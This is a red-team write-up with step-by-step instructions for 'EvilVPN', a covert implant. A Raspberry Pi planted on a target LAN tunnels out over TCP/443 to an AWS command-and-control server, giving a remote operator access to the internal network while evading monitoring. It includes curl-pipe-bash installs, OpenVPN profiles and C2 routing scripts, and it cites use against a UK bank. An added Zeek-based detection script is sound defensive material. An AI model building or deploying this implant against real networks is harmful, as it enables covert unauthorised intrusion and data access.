EvilVPN

Introduction

EvilVPN is a mechanism in which a malicious device, referred to as the Network Spike, tunnels out of a target's network over TCP port 443, establishing an outbound TCP VPN connection back to the EvilVPN Command and Control (C2) server. The EvilVPN server then establishes its own UDP VPN connection back down that outbound TCP tunnel to the Network Spike. This gives the EvilVPN server access to the LAN the Network Spike is connected to without any port forwarding or inbound firewall rules, and makes the connection difficult for a SOC to spot: at the port level all they see is an outbound connection to 443 that looks like HTTPS. Note the limit of that claim: OpenVPN in TCP mode carries its TLS control channel inside its own packet framing rather than speaking TLS directly on the socket, so a sensor that does protocol detection instead of trusting the port number will record a long-lived 443 flow that never negotiates TLS, which is itself an anomaly worth alerting on.
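The SOC-side check that the paragraph above invites, as an added example that is not part of the original EvilVPN write-up: a small POSIX shell and awk script that scans Zeek conn.log lines for outbound TCP/443 flows that never negotiated TLS, stay up for a long time and push more data out than they pull in. The log excerpt is constructed; the column positions match Zeek's default conn.log layout; the duration threshold, the RFC1918 origin test and the out-bytes-over-in-bytes heuristic are this example's own assumptions, not something the write-up specifies.

```shell
#!/bin/sh
# Added blue-team check, not part of the original EvilVPN write-up: flag
# outbound TCP/443 flows that look like a raw OpenVPN-over-TCP tunnel rather
# than HTTPS. Input is Zeek conn.log lines (tab separated; the first eleven
# columns are ts, uid, id.orig_h, id.orig_p, id.resp_h, id.resp_p, proto,
# service, duration, orig_bytes, resp_bytes). The sample below is constructed.
set -eu

# Constructed conn.log excerpt: one normal HTTPS request, one long-lived
# upload-heavy 443 flow that Zeek never classified as TLS (the tunnel), a long
# TLS download, a short reconnect of the tunnel, a UDP/443 flow and an inbound
# connection to a LAN host on 443.
sample_conn_log() {
  printf '#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto\tservice\tduration\torig_bytes\tresp_bytes\n'
  printf '%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n' \
    1715000000.000 CHx1a 10.10.20.15 51544 203.0.113.10 443 tcp ssl 12.4 1830 54210 \
    1715000010.000 CHx2b 10.10.20.77 40912 198.51.100.5 443 tcp - 14520.6 48213770 9120044 \
    1715000020.000 CHx3c 10.10.20.15 51560 203.0.113.22 443 tcp ssl 7302.1 120400 4993120 \
    1715000030.000 CHx4d 10.10.20.77 40977 198.51.100.5 443 tcp - 48.2 2010 1200 \
    1715000040.000 CHx5e 10.10.20.40 55000 192.0.2.9 443 udp - 5400.0 900000 500000 \
    1715000050.000 CHx6f 203.0.113.50 44000 10.10.20.77 443 tcp - 9000.0 100 50
}

# Read conn.log lines on stdin and print one line per suspect flow.
# A flow is suspect when: it originates from an RFC1918 address, goes to
# TCP/443, Zeek saw no TLS (service is not "ssl"), it lasted at least $1
# seconds (default 3600), and at least as many bytes went out as came back,
# which is what a reverse tunnel carrying LAN replies to its controller does.
find_tunnel_like_flows() {
  min_dur="${1:-3600}"
  awk -F'\t' -v min="$min_dur" '
    /^#/ { next }   # skip Zeek header/comment lines
    $3 ~ /^(10\.|192\.168\.|172\.(1[6-9]|2[0-9]|3[01])\.)/ &&
      $6 == 443 && $7 == "tcp" && $8 != "ssl" &&
      $9 >= min && $10 >= $11 {
      printf "%s -> %s:%s dur=%ds out=%d in=%d service=%s\n",
        $3, $5, $6, $9, $10, $11, $8
    }'
}

# Demo run on the constructed sample; feed a real conn.log on stdin instead.
sample_conn_log | find_tunnel_like_flows "${1:-3600}"
```

To run it against a real sensor, replace the final line with find_tunnel_like_flows 3600 < /path/to/conn.log. The long TLS download in the sample is not flagged because Zeek labelled it ssl, so the whole heuristic rests on a sensor that performs protocol detection rather than assuming that port 443 means HTTPS; lowering the threshold to a few tens of seconds also surfaces the short reconnects a tunnel produces when the TCP session drops.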

Use Case

This is similar to other Network Spikes that use dual-NIC techniques, where the C2 server connects in over something like cellular and is then routed out of the Network Spike's LAN interface. The EvilVPN method works in any scenario where the Network Spike can join the LAN and reach the internet from it, so it bypasses protections such as RF shielding or RF monitoring and can be used in highly remote locations where other connectivity is not available. In effect it lets you live off the land of the target's own network.

In a recent example, G3 used this in a red team against a bank in the UK: the G3 operator connected a clean Windows 11 laptop to the bank's guest Wi-Fi, which acted as the Network Spike for a remote operator to begin VLAN hopping out of the guest Wi-Fi subnet. This freed the onsite operator to focus on other on-prem attacks.

How To

  1. On AWS, create an EC2 instance that will be our command and control server, referred to as EvilVPN.

    This should be a Debian instance. Attach a second network interface and assign an Elastic IP to each of the two interfaces.

  2. The second device is the sharp end of the set-up, the one that gets deployed on target. In this document we refer to it as the Network Spike.

    This can be a stock Raspberry Pi.

    Use the PiVPN script to build a stock OpenVPN UDP server on it:

    curl -L https://install.pivpn.io | bash

    Then create a client profile for the EvilVPN server (nopass means the client key is not passphrase protected, so the client can start unattended):

    pivpn add nopass
  3. Modify the Netplan Configuration: back on the EvilVPN server we need to configure it to handle two interfaces with addresses on the same subnet. Netplan brings both interfaces up with DHCP; the source-based routing rules that keep each address's traffic on its own interface are applied by a separate script (next step) once the interfaces are up.

    Here is the netplan configuration for the two interfaces (the MAC addresses are from the example instance; use your own):

    network:
      version: 2
      ethernets:
        enX0:
          dhcp4: true
          dhcp6: false
          match:
            macaddress: 06:ab:96:36:58:bf
          set-name: enX0
        enX1:
          dhcp4: true
          dhcp6: false
          match:
            macaddress: 06:5c:67:37:79:09
          set-name: enX1
  4. Create a Script for Routing Rules: next, create the script that sets up the custom routing rules. Without them, replies sourced from the second interface's address would leave via the first interface, and AWS drops packets whose source address does not belong to the interface they leave on.

    Create the script at /etc/netplan/routingscript.sh:

    sudo nano /etc/netplan/routingscript.sh

    Add the following content (replace the addresses with the private IPs of your own interfaces and your VPC subnet's router):

    #!/bin/bash
    # Source-based policy routing for the two interfaces.
    # enX0: traffic sourced from its address uses table 200
    ip rule add from 172.31.21.210 table 200
    ip route add default via 172.31.16.1 dev enX0 table 200
    # enX1: traffic sourced from its address uses table 201
    ip rule add from 172.31.29.250 table 201
    ip route add default via 172.31.16.1 dev enX1 table 201

    Save and close the file.

  5. Make the Script Executable: Make sure the script is executable:

    sudo chmod +x /etc/netplan/routingscript.sh
  6. Add the Script to Run on Boot: since networkd-dispatcher is not installed on a stock Debian image, you can have the script run automatically from /etc/rc.local, which systemd's rc-local.service executes at boot when the file exists and is executable. If the file doesn't exist, create it:

    sudo nano /etc/rc.local

    Add the following content:

    #!/bin/bash
    /etc/netplan/routingscript.sh
    exit 0

    Save the file and make it executable:

    sudo chmod +x /etc/rc.local
  7. Apply the Netplan Configuration: Finally, apply the netplan configuration:

    sudo netplan apply
  8. Verify the Routing Rules: After rebooting or restarting the network, verify that the routing rules have been applied:

    ip rule show
    ip route show table 200
    ip route show table 201
  9. Now run the same PiVPN installer on the EvilVPN server:

    curl -L https://install.pivpn.io | bash

    Again choose OpenVPN, but this time set the protocol to TCP rather than UDP and set the port to 443 (the default is 1194).

    Then create a client profile for the Network Spike:

    pivpn add nopass
  10. Disable gateway takeover: in the Network Spike's client profile (the one exported in step 9), add the line:

    pull-filter ignore "route-gateway"

    pull-filter tells the OpenVPN client to discard pushed options that match the given prefix. This stops the Spike from accepting a gateway from the EvilVPN server, which would otherwise send the Spike's own internet traffic up the tunnel and create a routing loop between the two VPNs. A cleaner way to achieve the same thing is pull-filter ignore "redirect-gateway", which drops the default-route push itself rather than the gateway address that push relies on.

  11. Config change on EvilVPN: in the client profile created for the EvilVPN server in step 2, change the remote line so it points at the address the TCP VPN issued to the Network Spike rather than at any address on the Spike's LAN. In this example that is 10.90.142.2, and 1194 is the UDP server's port on the Spike:

    remote 10.90.142.2 1194

    The UDP VPN is therefore dialled through the TCP tunnel, so nothing ever has to reach the Spike from the outside.
  12. Bring up the tunnels. On the Network Spike, start the TCP client profile first:

    sudo openvpn netspike.ovpn

    Then switch to the EvilVPN server and start the UDP client profile that goes down that tunnel:

    sudo openvpn evilvpn.ovpn
  13. Alter routing: on the EvilVPN server, correct the routing with the commands below (change the addresses to match your set-up: here 10.83.78.0/24 is the UDP tunnel on tun1 with the Network Spike at 10.83.78.1, 10.90.142.0/24 is the TCP tunnel on tun0, and 172.31.16.0/20 is the VPC subnet). Where the same destination is added once per interface, the kernel rejects the second add with "File exists" unless the entries differ, so the per-interface pairs below carry distinct metrics and use replace rather than add, which also lets them be re-run after a tunnel reconnects:

    # remove the def1 default-route override pushed by the Spike's UDP server
    sudo ip route del 0.0.0.0/1 via 10.83.78.1
    sudo ip route del 128.0.0.0/1 via 10.83.78.1
    # remove the host route the UDP client added towards the Spike via the VPC
    # gateway: 10.90.142.2 is only reachable through the TCP tunnel on tun0
    sudo ip route del 10.90.142.2 via 172.31.16.1
    # the UDP tunnel becomes the default route; the VPC stays as fallback on both interfaces
    sudo ip route replace default via 10.83.78.1 dev tun1
    sudo ip route replace default via 172.31.16.1 dev enX0 metric 100
    sudo ip route replace default via 172.31.16.1 dev enX1 metric 200
    # tunnel subnets
    sudo ip route replace 10.83.78.0/24 dev tun1
    sudo ip route replace 10.90.142.0/24 dev tun0
    # AWS resolver, VPC subnet and VPC gateway reachable via either interface
    sudo ip route replace 172.31.0.2 via 172.31.16.1 dev enX0 metric 100
    sudo ip route replace 172.31.0.2 via 172.31.16.1 dev enX1 metric 200
    sudo ip route replace 172.31.16.0/20 dev enX0 metric 100
    sudo ip route replace 172.31.16.0/20 dev enX1 metric 200
    sudo ip route replace 172.31.16.1 dev enX0 metric 100
    sudo ip route replace 172.31.16.1 dev enX1 metric 200

    Check the result with ip route show: default traffic should now leave via tun1 towards the Network Spike, the VPC routes should still be present on both interfaces, and the Spike's TCP tunnel address should be reachable only through tun0.
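Steps 3, 4 and 13 pulled together as one parameterised script, added here as an example rather than taken from the original write-up: it prints (or, with DRY_RUN=0 and run as root, executes) the policy-routing commands for the two interfaces and the post-tunnel routing fix-up, using the write-up's example addresses as defaults that can be overridden through environment variables. The interface names and addresses are the examples from the steps above; the metric values, the use of replace instead of add, and the delete-before-add on the ip rule lines are this script's own choices so that it can be re-run safely after a tunnel drops.

```shell
#!/bin/sh
# Added example, not part of the original EvilVPN write-up: the EvilVPN-side
# routing from steps 3/4 (source-based policy routing for the two ENIs) and
# step 13 (routing fix-up once both tunnels are up) as one parameterised,
# idempotent script. Defaults are the example addresses from the write-up;
# override them with environment variables. DRY_RUN=1 (default) prints the ip
# commands, DRY_RUN=0 executes them (run as root).
set -eu

: "${ENI0:=enX0}"                  # first EC2 interface
: "${ENI1:=enX1}"                  # second EC2 interface
: "${ENI0_IP:=172.31.21.210}"      # private address on ENI0
: "${ENI1_IP:=172.31.29.250}"      # private address on ENI1
: "${VPC_GW:=172.31.16.1}"         # VPC subnet router
: "${VPC_NET:=172.31.16.0/20}"     # VPC subnet
: "${VPC_DNS:=172.31.0.2}"         # AWS resolver
: "${TCP_TUN:=tun0}"               # TCP/443 server tunnel (the Spike dials in here)
: "${TCP_TUN_NET:=10.90.142.0/24}"
: "${SPIKE_TCP_IP:=10.90.142.2}"   # Spike's address on the TCP tunnel
: "${UDP_TUN:=tun1}"               # UDP client tunnel dialled back down to the Spike
: "${UDP_TUN_NET:=10.83.78.0/24}"
: "${UDP_TUN_GW:=10.83.78.1}"      # Spike's address on the UDP tunnel
: "${DRY_RUN:=1}"

# Steps 3/4: replies must leave via the ENI that owns their source address,
# otherwise AWS drops them. "ip rule add" is not idempotent, so delete first.
policy_routing_cmds() {
  cat <<EOF
ip rule del from $ENI0_IP table 200 2>/dev/null || true
ip rule add from $ENI0_IP table 200
ip route replace default via $VPC_GW dev $ENI0 table 200
ip rule del from $ENI1_IP table 201 2>/dev/null || true
ip rule add from $ENI1_IP table 201
ip route replace default via $VPC_GW dev $ENI1 table 201
EOF
}

# Step 13: drop the def1 override pushed by the Spike's UDP server and the
# stray host route the UDP client added towards the Spike via the VPC gateway
# (the Spike's tunnel address is only reachable through the TCP tunnel), then
# make the UDP tunnel the preferred default with the VPC as fallback on both
# ENIs. "replace" plus distinct metrics keeps every line valid on a re-run.
tunnel_route_cmds() {
  cat <<EOF
ip route del 0.0.0.0/1 via $UDP_TUN_GW 2>/dev/null || true
ip route del 128.0.0.0/1 via $UDP_TUN_GW 2>/dev/null || true
ip route del $SPIKE_TCP_IP via $VPC_GW 2>/dev/null || true
ip route replace default via $UDP_TUN_GW dev $UDP_TUN metric 50
ip route replace default via $VPC_GW dev $ENI0 metric 100
ip route replace default via $VPC_GW dev $ENI1 metric 200
ip route replace $UDP_TUN_NET dev $UDP_TUN
ip route replace $TCP_TUN_NET dev $TCP_TUN
ip route replace $VPC_DNS via $VPC_GW dev $ENI0 metric 100
ip route replace $VPC_DNS via $VPC_GW dev $ENI1 metric 200
ip route replace $VPC_NET dev $ENI0 metric 100
ip route replace $VPC_NET dev $ENI1 metric 200
ip route replace $VPC_GW dev $ENI0 metric 100
ip route replace $VPC_GW dev $ENI1 metric 200
EOF
}

# Print each generated command (DRY_RUN=1) or execute it (DRY_RUN=0).
run_cmds() {
  while IFS= read -r line; do
    if [ "$DRY_RUN" = "1" ]; then
      printf '%s\n' "$line"
    else
      sh -c "$line"
    fi
  done
}

main() {
  case "${1:-}" in
    policy) policy_routing_cmds | run_cmds ;;
    tunnel) tunnel_route_cmds | run_cmds ;;
    *) echo "usage: DRY_RUN=0 $0 policy|tunnel  (DRY_RUN=1 only prints)" >&2 ;;
  esac
}

main "$@"
```

Run it as "./evilvpn-routes.sh policy" from /etc/rc.local in place of routingscript.sh and as "./evilvpn-routes.sh tunnel" after both OpenVPN clients have connected; with DRY_RUN left at 1 it only prints, which is the safest way to confirm the addresses before touching a live routing table.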

Conclusion

You are now done, and the Network Spike will route traffic into the target's network as required.
